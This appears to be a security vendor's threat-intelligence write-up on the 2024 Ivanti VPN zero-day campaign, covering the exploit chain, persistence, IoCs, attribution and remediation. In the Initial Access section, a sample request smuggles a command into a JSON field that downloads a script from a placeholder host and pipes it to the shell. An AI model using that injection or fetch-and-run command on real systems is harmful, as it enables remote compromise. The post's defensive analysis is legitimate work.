Inside the Ivanti Zero-Day Exploitation Campaign
Anatomy of a Hack

In early 2024, multiple advanced persistent threat (APT) groups exploited a series of zero-day vulnerabilities in Ivanti Connect Secure and Policy Secure VPN appliances. The flaws, eventually assigned CVE-2024-21887 and CVE-2024-21893, enabled unauthenticated attackers to achieve remote code execution (RCE) and gain unauthorized access to sensitive government, defense, and corporate networks globally.
Silent Breach threat intelligence teams tracked these campaigns in real time, correlating indicators from intrusion telemetry, reverse engineering captured payloads, and analyzing infrastructure overlap with known PRC-affiliated actors.
Initial Access
The attack began with exploitation of CVE-2024-21893, a server-side request forgery (SSRF) vulnerability in Ivanti Connect Secure. This flaw allowed attackers to access restricted internal resources via crafted HTTP requests. Once the SSRF was successful, attackers chained it with CVE-2024-21887, a command injection flaw in the web component.
Payloads were encoded in legitimate-looking POST requests, leveraging parameters in /api/v1/totp/user-backup-code to inject shell commands via malformed JSON inputs. A sample payload:
POST /api/v1/totp/user-backup-code HTTP/1.1
Host: [target]
Content-Type: application/json

{
"user": "; curl http://malicious[.]host/payload.sh | sh; echo"
}
Establishing Persistence
Once the attacker gained code execution, they deployed custom webshells to the appliance’s non-persistent directories, bypassing standard filesystem protections. One common implant was a modified Perl-based shell that blended into legitimate components like dsserver.cgi.
To maintain access even after reboots or patches, attackers tampered with Ivanti's internal configuration files (/data/runtime/mtx.conf) and enabled reverse SSH tunnels to C2 infrastructure. In some variants, modified cron jobs were used to periodically re-fetch implants from attacker-controlled S3 buckets.
Lateral Movement and Data Exfiltration
After compromising the VPN gateway, attackers conducted credential harvesting by hooking into active sessions. They exfiltrated session cookies, AD tokens, and configuration files containing encrypted secrets.
In several observed intrusions, attackers pivoted into downstream environments using harvested credentials. RDP, SMB, and PowerShell Remoting were used to move laterally. Where EDR was detected, attackers used in-memory tools like Cobalt Strike and Sliver to evade disk-based detection.
TTPs and Infrastructure Analysis
Initial Access: SSRF + Command Injection
C2 Protocols: HTTPS over non-standard ports, reverse SSH, DNS tunneling (via iodine)
Payload Hosting: Alibaba Cloud, DigitalOcean droplets, S3 buckets with public read access
Persistence: Webshells in /data/runtime/, cron jobs, tampered config reload scripts
Evasion: Timestomping, WMI-based reconnaissance, API throttling to evade logging
Indicators of Compromise (IoCs)
Webshell hash: e5f89f2c1c8f65c29a6e5d541e81ad3e
C2 domain: secureupdate-vpn[.]com
Malicious IPs: 45.88.12.44, 142.132.222.12
Modified files: /data/runtime/mtx.conf, /data/runtime/tmp/sshd_config
Attribution
Attribution for this campaign is ongoing, but strong indicators point to multiple Chinese nation-state groups, likely operating under the Ministry of State Security (MSS) umbrella. Silent Breach analysts identified operational overlaps with known tactics used by APT5 and UNC4841, including:
Shared infrastructure with prior Fortinet and Pulse Secure VPN campaigns.
Payload encryption routines and loader structures matching known MSS malware families.
C2 domain registration patterns (name servers, certificate issuers) linked to past PRC cyber campaigns.
While some of the infrastructure appeared to be leased via third-party providers, forensics revealed consistent operational discipline, encrypted telemetry, and use of Chinese-language debugging strings. These findings align with past campaigns targeting zero-day vulnerabilities in perimeter devices.
The attack’s timing, sophistication, and targeting also suggest strategic intelligence collection rather than immediate monetization, further strengthening the case for a state-sponsored actor.
Impact Assessment and Remediation
Victims spanned North America, Europe, and APAC, including defense contractors, energy firms, and major universities. The compromise allowed attackers to bypass MFA, intercept sensitive data in transit, and establish long-term persistence inside segmented environments. Detection was difficult because VPN infrastructure operates as a trusted conduit for enterprise traffic.
Security teams should immediately:
Inspect /data/runtime/ for unauthorized modifications
Rotate all credentials stored or transmitted via the VPN
Audit access logs for unusual POST requests to TOTP or configuration APIs
Deploy endpoint monitoring for lateral movement from Ivanti appliances
Ivanti released patches in February 2024. Silent Breach recommends redeploying affected appliances from clean images, not simply applying patches, due to potential backdoor implants.
How Silent Breach Can Help
Silent Breach provides advanced threat simulations that emulate nation-state exploitation of zero-day vulnerabilities. Our team offers forensic audits of VPN infrastructure, custom YARA rules for webshell detection, and red team exercises targeting perimeter access vectors.
To assess your exposure to the Ivanti intrusion or similar threat campaigns, contact Silent Breach for a tailored compromise assessment and defense validation.
About Silent Breach: Silent Breach is an award-winning provider of cyber security services. Our global team provides cutting-edge insights and expertise across the Data Center, Enterprise, SME, Retail, Government, Finance, Education, Automotive, Hospitality, Healthcare and IoT industries.